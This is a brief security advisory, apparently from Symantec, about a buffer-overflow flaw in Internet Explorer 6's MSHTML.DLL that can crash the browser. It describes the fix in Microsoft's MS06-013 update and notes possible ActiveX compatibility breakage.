Microsoft Internet Explorer Script Action Handler Buffer Overflow Vulnerability

Microsoft Internet Explorer is susceptible to a remote buffer-overflow vulnerability in 'MSHTML.DLL'. The application fails to properly bounds-check user-supplied input data before copying it into an insufficiently sized memory buffer.

Remote attackers may exploit this issue to crash affected web browsers. Remote code execution may also be possible, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; other versions may also be affected.

Microsoft Internet Explorer Script Action Handler Buffer Overflow Vulnerability

Solution:
Microsoft has released a cumulative update to address this issue. Please see the referenced advisories for further information.

Reportedly, the fixes provided in MS06-013 may cause unintended breakage with certain ActiveX controls. Symantec has not confirmed this. Before deploying this patch in production environments, users should thoroughly test the patch to ensure that it doesn't interfere with other software.
